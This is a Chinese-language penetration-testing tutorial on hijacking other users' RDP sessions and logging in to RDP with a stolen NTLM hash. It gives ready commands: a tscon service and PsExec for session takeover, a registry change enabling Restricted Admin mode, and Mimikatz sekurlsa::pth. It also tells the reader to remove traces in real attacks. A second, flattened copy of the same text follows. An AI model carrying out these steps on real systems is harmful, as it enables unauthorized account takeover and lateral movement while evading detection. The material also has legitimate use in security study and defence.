内网技巧-RDP劫持及利用hash登录
字数 1120 2025-08-19 12:42:18

内网渗透技巧:RDP会话劫持与Hash登录利用

前言

本文详细记录两种内网渗透中RDP(远程桌面协议)的高级利用技术:RDP会话劫持和利用Hash登录RDP。这些技术适用于在无法获取明文密码但需要远程桌面访问权限的特殊场景。

一、RDP会话劫持技术

技术背景

RDP会话劫持是一种允许攻击者在获取SYSTEM权限后,无需知道其他用户的登录凭据即可接管其RDP会话的技术。该漏洞由以色列安全研究员Alexander Korznikov于2017年披露。

利用条件

  • 已获取目标机器的SYSTEM权限
  • 目标系统上有其他活跃的RDP会话

利用方法

方法1:通过系统服务实现

  1. 查看当前会话

    quser
或
qwinsta

  2. 创建劫持服务

    sc create rdp binpath= "cmd.exe /k tscon 2 /dest:console"
sc qc rdp
sc start rdp

    注:等号后必须有空格,数字"2"为目标会话ID

  3. 清理痕迹

    sc delete rdp

方法2:通过PsExec工具实现

  1. 获取SYSTEM权限命令行

    psexec -s -i cmd

  2. 查看并劫持会话

    quser
tscon 2 /dest:console

注意事项:

  • 两种方法都需要管理员权限运行CMD
  • Windows 10等高版本系统可能限制服务获取SYSTEM权限
  • 真实攻击环境中务必清理痕迹

二、利用Hash登录RDP

技术背景

当无法破解Hash但需要RDP访问时,可通过"受限管理员模式"(Restricted Admin Mode)实现Hash传递攻击。Windows 8.1和Server 2012 R2默认开启此功能。

配置方法

1. 开启受限管理员模式

注册表修改方法:

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

验证是否开启:

REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"

期望结果:DisableRestrictedAdmin REG_DWORD 0x0

2. 客户端连接方式

mstsc.exe /restrictedadmin

使用Mimikatz进行Hash传递

  1. 执行命令

    privilege::debug
sekurlsa::pth /user:用户名 /domain:域名或计算机名 /ntlm:哈希值 "/run:mstsc.exe /restrictedadmin"

  2. 常见错误解决

    • ERROR kuhl_m_sekurlsa_acquireLSA:检查Mimikatz版本与系统兼容性
    • error kuh1_m_sekurlsa_acquireLSA:logon list:更新到最新版Mimikatz
    • CredSSP加密数据库错误:常见于Win10家庭版,建议使用Server系统

重要限制

  • 仅对管理员组用户有效
  • 远程桌面用户组无法使用此方法
  • 客户端和服务器端都需支持受限管理员模式

参考资源

  1. [RDP会话劫持 Ladon无密码登陆管理员桌面会话]
  2. [Passwordless RDP Session Hijacking Feature All Windows versions]
  3. [渗透技巧——Pass the Hash with Remote Desktop(Restricted Admin mode)]
  4. [Hash传递攻击Windows2012远程桌面]

免责声明

本文仅用于技术研究和交流目的,严禁用于非法活动。使用者需自行承担所有后果。

内网渗透技巧:RDP会话劫持与Hash登录利用 前言 本文详细记录两种内网渗透中RDP(远程桌面协议)的高级利用技术:RDP会话劫持和利用Hash登录RDP。这些技术适用于在无法获取明文密码但需要远程桌面访问权限的特殊场景。 一、RDP会话劫持技术 技术背景 RDP会话劫持是一种允许攻击者在获取SYSTEM权限后,无需知道其他用户的登录凭据即可接管其RDP会话的技术。该漏洞由以色列安全研究员Alexander Korznikov于2017年披露。 利用条件 已获取目标机器的SYSTEM权限 目标系统上有其他活跃的RDP会话 利用方法 方法1:通过系统服务实现 查看当前会话 创建劫持服务 注:等号后必须有空格,数字"2"为目标会话ID 清理痕迹 方法2:通过PsExec工具实现 获取SYSTEM权限命令行 查看并劫持会话 注意事项: 两种方法都需要管理员权限运行CMD Windows 10等高版本系统可能限制服务获取SYSTEM权限 真实攻击环境中务必清理痕迹 二、利用Hash登录RDP 技术背景 当无法破解Hash但需要RDP访问时,可通过"受限管理员模式"(Restricted Admin Mode)实现Hash传递攻击。Windows 8.1和Server 2012 R2默认开启此功能。 配置方法 1. 开启受限管理员模式 注册表修改方法: 验证是否开启: 期望结果:DisableRestrictedAdmin REG_ DWORD 0x0 2. 客户端连接方式 使用Mimikatz进行Hash传递 执行命令 常见错误解决 ERROR kuhl_m_sekurlsa_acquireLSA :检查Mimikatz版本与系统兼容性 error kuh1_m_sekurlsa_acquireLSA:logon list :更新到最新版Mimikatz CredSSP加密数据库错误:常见于Win10家庭版,建议使用Server系统 重要限制 仅对管理员组用户有效 远程桌面用户组无法使用此方法 客户端和服务器端都需支持受限管理员模式 参考资源 [ RDP会话劫持 Ladon无密码登陆管理员桌面会话 ] [ Passwordless RDP Session Hijacking Feature All Windows versions ] [ 渗透技巧——Pass the Hash with Remote Desktop(Restricted Admin mode) ] [ Hash传递攻击Windows2012远程桌面 ] 免责声明 本文仅用于技术研究和交流目的,严禁用于非法活动。使用者需自行承担所有后果。